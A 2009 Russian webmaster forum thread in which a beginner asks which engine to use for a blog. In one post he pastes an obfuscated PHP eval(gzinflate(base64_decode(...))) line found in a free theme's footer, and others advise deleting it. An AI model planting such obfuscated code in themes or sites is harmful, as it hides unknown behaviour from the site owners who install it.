Перейти к содержимому

Создание блога

#1 Bender

Bender
  • Пользователь
  • 712 сообщений
0

Отправлено 08 Январь 2009 - 22:03

В общем вот я решил создать свой блог.
И тему это создал чтоб было где задавать вопросы. Пришла мне это идея в голову когда я понял что чтобы продвинуть сайт так, чтобы радоваться отдаче (адсенсу), нужно много денег, которых у меня нет. А в блогуне за посты платят конкретные деньги в конкретное время.

Я так подумал и решил что мне самому будет нравиться вести блог на интересную мне тему. Тему я выбрал Работа в интернете, т.к. ей я щас интересуюсь у деляю большуе часть времени. Но только я там не буду писать что я лучший сеошник и зарабатываю много... , а буду писать свою историю, наблюдения, мнения и впечатления... в общем правду, ни капли лжи. Наверное буду делать только посты, ИМХО - всякие обзоры замусорят блог (если я не прав - отпишитесь).

Итак первый вопрос:
Какой выбрать движек? Скорее всего посоветуете вордпрес - какую версию и (если можно) ссылку.
(Знаю что ответов на этот вопрос в инете полно, но всеже хотелось бы чтобы мне ответили Вы)

• 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
Советую обратить внимание на следующее:
  1. Алгоритм создания нового блога
  2. Cоздание блога на Joomla!
  3. 9 советов новичкам при создании блога
  4. Wordpress НЕ только для блога или создание различных типов сайтов на этой CMS
  5. 15 мифов при введении и продвижении блога

#2 admin

admin
  • Пользователь PRO
  • 5 272 сообщений

Отправлено 08 Январь 2009 - 22:30

Вордпресс последней версии ставьте только, а скачать можно например с _http://mywordpress.ru/
  • 0

Сколько лет прошло, а ссылки всё ещё лучше покупать тут

#3 Bender

Bender
    Topic Starter
  • Пользователь
  • 712 сообщений

Отправлено 08 Январь 2009 - 22:48

Ссылка не работает
  • 0

#4 admin

admin
  • Пользователь PRO
  • 5 272 сообщений

Отправлено 08 Январь 2009 - 22:55

WordPress-Russia.org — Команда официальной русской локализации

Взял с википедии... :)
  • 0

Сколько лет прошло, а ссылки всё ещё лучше покупать тут

#5 Galeodor

Galeodor
  • Пользователь
  • 1 172 сообщений

Отправлено 08 Январь 2009 - 23:00

lecactus.ru

отсюда качай =) там руссифицированная, и баги убраны.
  • 0

#6 Bender

Bender
    Topic Starter
  • Пользователь
  • 712 сообщений

Отправлено 13 Январь 2009 - 13:51

Учтановил, нашел интересную тему, но ее автор в подвал нагло напихал ссылок и фаил подвала выглядит не как все а вот так
<? eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
'))); ?>
Что это такое я не знаю, но если все это стереть и сохранить то вроде все пашет. Не будет ли из-за этого осложнений, не будет ли движек тупить и долго думать?
  • 0

#7 ilyazh

ilyazh
  • Пользователь
  • 356 сообщений

Отправлено 13 Январь 2009 - 14:13

Удаляйте нафиг!! А то в бан попадёте. Это ссылки скрытые на сайт разработчика. Если удалите - будет только лучше.
з.ы. Всегда когда качаете тему, а не делаете сами - проверяйте на наличие в ней вот такой херни.

• 0

#8 Bender

Bender
    Topic Starter
  • Пользователь
  • 712 сообщений

Отправлено 13 Январь 2009 - 15:26

Так и сделал - удалил.

1) А за что в бан попасть можно? Ссылки на странице видны, написаны читаемым текстом...

2) Я так понимаю на wordpress.org ccылку поставить нужно?
  • 0

#9 ilyazh

ilyazh
  • Пользователь
  • 356 сообщений

Отправлено 13 Январь 2009 - 15:51

1) Ну видны, а сколько ещё не видны? Даже если всё по честному, то я бы убрал. Ибо если бы человек сделал нормальным хтмл кодом, то я бы оставил, если тема бесплатная. Но человек сделал по хитрому, в расчёте на то, что все такие дурачки =) Короче ссылки "умников" я удаляю даже не думаю. Бан можно получить за спам т.к. неизвестно сколько ссылок (1 показана, а сколько скрытых? Может быть сотни) и с каким анкором идёт с вашего блога на сайт автора.

2) Если хотите, то ставьте, а если нет, то не надо. Вордпресс бесплатный движок и распространяется бесплатно и ссылку размещать вы не обязаны. Т.е. по желанию
  • 0

#10 Bender

Bender
    Topic Starter
  • Пользователь
  • 712 сообщений

Отправлено 13 Январь 2009 - 16:22

Бан можно получить за спам т.к. неизвестно сколько ссылок (1 показана, а сколько скрытых? Может быть сотни) и с каким анкором идёт с вашего блога на сайт автора.

Не знал что такое бывает ;) А как можно проверить, может у меня еще такие ссылки есть?
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений

Оформление форума – IPBSkins.ru